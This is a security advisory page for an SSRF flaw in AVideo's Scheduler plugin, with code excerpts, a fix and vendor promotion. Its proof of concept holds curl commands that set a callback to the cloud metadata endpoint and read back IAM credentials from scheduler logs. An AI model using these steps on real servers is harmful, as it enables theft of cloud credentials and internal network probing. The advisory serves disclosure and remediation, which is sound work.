CVE-2026-33237

CVE-2026-33237 is a medium-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0.

Summary

The Scheduler plugin's run() function in plugin/Scheduler/Scheduler.php calls url_get_contents() with an admin-configurable callbackURL that is validated only by isValidURL() (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through isSSRFSafeURL(), which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network callbackURL to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet.

Details

The vulnerable code is at plugin/Scheduler/Scheduler.php:157-166:

// Line 157: callback URL retrieved and site-root token substituted
$callBackURL = $e->getCallbackURL();
$callBackURL = str_replace('$SITE_ROOT_TOKEN', $global['webSiteRootURL'], $callBackURL);
if (!isValidURL($callBackURL)) {
    return false;
}
// isValidURL() only checks URL format via filter_var(..., FILTER_VALIDATE_URL)
// The critical missing check is:
// if (!isSSRFSafeURL($callBackURL)) { return false; }
if (empty($_executeSchelude[$callBackURL])) {
    $_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);
}

isValidURL() in objects/functions.php uses filter_var($url, FILTER_VALIDATE_URL); it validates URL syntax only and does not block internal or private network targets.

isSSRFSafeURL() in objects/functions.php:4021 explicitly blocks:

  • 127.x.x.x / ::1 (loopback)
  • 10.x.x.x, 172.16-31.x.x, 192.168.x.x (RFC-1918 private)
  • 169.254.x.x (link-local, including AWS/GCP metadata at 169.254.169.254)
  • IPv6 private ranges

This function was added to the LiveLinks proxy (GHSA-9x67-f2v7-63rw fix, commit 0e5638292) and was previously used in the aVideoEncoder download flow (GHSA-h39h-7cvg-q7j6), but the Scheduler plugin was not updated in either fix wave, leaving it as an incomplete patch.

An admin can configure the callbackURL for a scheduled task via the Scheduler plugin UI and trigger execution immediately via the "Run now" interface.

PoC

# Step 1: Authenticate as admin

# Step 2: Create a scheduled task with cloud metadata SSRF callback
curl -b "admin_session=<session>" -X POST \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/add.json.php \
  -d "callbackURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&status=a&type=&date_to_execute=2026-03-18+12:00:00"

# Step 3: Trigger immediate execution via Scheduler run endpoint
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/run.php

# Step 4: Read the scheduler execution logs
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/get.json.php
# Response includes the AWS metadata API response with IAM role credentials

Expected: internal network addresses are rejected before any HTTP request is made.
Actual: The server makes an HTTP request to http://169.254.169.254/latest/meta-data/iam/security-credentials/ and the response (including AWS IAM role credentials) is stored in the scheduler execution log.

Impact

  • Cloud credential theft: On AWS, GCP, or Azure deployments, the attacker can retrieve IAM instance role credentials from the cloud metadata service (169.254.169.254), potentially enabling privilege escalation within the cloud environment.
  • Internal service probing: The attacker can make the server issue requests to internal APIs, microservices, or databases with HTTP interfaces not exposed to the internet.
  • Incomplete patch amplification: The fix for GHSA-9x67-f2v7-63rw and GHSA-h39h-7cvg-q7j6 added isSSRFSafeURL() to specific call sites but not the Scheduler. Deployments that updated expecting comprehensive SSRF protection remain vulnerable via this path.
  • Blast radius: Requires admin access. Impact is significant in cloud-hosted deployments where instance metadata credentials unlock broader infrastructure access.

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2026-33237 has a CVSS score of 5.5 (Medium). The vector is network-reachable, requires high privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (26.0); upgrading removes the vulnerable code path.

Affected versions

wwbn/avideo (<= 25.0)

Security releases

wwbn/avideo → 26.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Add isSSRFSafeURL() validation to the Scheduler callback URL before url_get_contents() is called, consistent with the existing SSRF fixes in plugin/LiveLinks/proxy.php and objects/aVideoEncoder.json.php:

$callBackURL = $e->getCallbackURL();
if (!isValidURL($callBackURL)) {
    return false;
}
// Add this SSRF check, same pattern as LiveLinks proxy fix (GHSA-9x67-f2v7-63rw):
if (!isSSRFSafeURL($callBackURL)) {
    _error_log("Scheduler::run SSRF protection blocked callbackURL: " . $callBackURL);
    return false;
}
if (empty($_executeSchelude[$callBackURL])) {
    $_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);
}
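As an added example (not AVideo's own isSSRFSafeURL(), whose implementation this page does not show), the PHP below builds a fail-closed target check from the blocked ranges listed above and applies it in the same order as the remediation: format check first, then target check, before any request is made. Function names, the fake resolver and its addresses are hypothetical; the resolver is injectable so the demo runs offline.

```php
<?php
// Added example (hypothetical names, not AVideo's own isSSRFSafeURL()): a fail-closed
// SSRF target check built from the rules the advisory lists.
// True when a literal IPv4/IPv6 address is loopback, RFC-1918, link-local (169.254.169.254
// included), IPv6 ULA/link-local or otherwise reserved. NO_PRIV_RANGE rejects 10/8, 172.16/12,
// 192.168/16, fc00::/7; NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, ::, fe80::/10.
function exampleIsInternalIp(string $ip): bool
{
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) === false;
}

// Format check (what isValidURL() does), then a target check on every address the host
// resolves to. $resolver is injectable so the demo below runs offline.
function exampleIsSsrfSafeUrl(string $url, ?callable $resolver = null): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $parts = parse_url($url) ?: [];
    if (!in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return false; // no file://, gopher://, ftp:// callbacks
    }
    $host = trim($parts['host'] ?? '', '[]'); // parse_url keeps brackets on IPv6 literals
    if ($host === '' || strcasecmp($host, 'localhost') === 0) {
        return false;
    }
    // Default resolver: literal IPs pass through, names go to DNS (IPv4 only, for brevity).
    $resolver ??= fn(string $h): array => filter_var($h, FILTER_VALIDATE_IP) !== false ? [$h] : (gethostbynamel($h) ?: []);
    $addresses = $resolver($host);
    if ($addresses === []) {
        return false; // unresolvable: fail closed
    }
    foreach ($addresses as $ip) {
        if (exampleIsInternalIp($ip)) {
            return false; // one internal answer blocks the whole request
        }
    }
    return true;
}

// Constructed resolver so the demo never touches real DNS (names and addresses are made up).
$fakeDns = fn(string $h): array => ['cdn.example' => ['198.51.100.7'], 'internal.corp' => ['10.0.0.5']][$h]
    ?? (filter_var($h, FILTER_VALIDATE_IP) !== false ? [$h] : []);
$metadata = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/';
var_dump(filter_var($metadata, FILTER_VALIDATE_URL) !== false);       // the format check alone, as isValidURL() does it
var_dump(exampleIsSsrfSafeUrl($metadata, $fakeDns));                  // the advisory's link-local metadata target
var_dump(exampleIsSsrfSafeUrl('http://[::1]/', $fakeDns));            // loopback literal
var_dump(exampleIsSsrfSafeUrl('http://internal.corp/api', $fakeDns)); // hostname resolving to an RFC-1918 address
var_dump(exampleIsSsrfSafeUrl('https://cdn.example/hook', $fakeDns)); // public callback
```

Validating resolved addresses before the request still leaves a window for DNS rebinding and for redirects that land on internal hosts, so the fetch itself should also run with redirects disabled or re-validate each hop.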

Frequently Asked Questions

  1. What is CVE-2026-33237? CVE-2026-33237 is a medium-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2026-33237? CVE-2026-33237 has a CVSS score of 5.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33237? wwbn/avideo (composer) versions <= 25.0 are affected.
  4. Is there a fix for CVE-2026-33237? Yes. CVE-2026-33237 is fixed in 26.0. Upgrade to this version or later.
  5. Is CVE-2026-33237 exploitable, and should I be worried? Whether CVE-2026-33237 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-33237 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33237? Upgrade wwbn/avideo to 26.0 or later.

Other vulnerabilities in wwbn/avideo

  • CVE-2026-33731
  • CVE-2026-33692
  • CVE-2026-33684
  • CVE-2026-54458
  • CVE-2026-50183
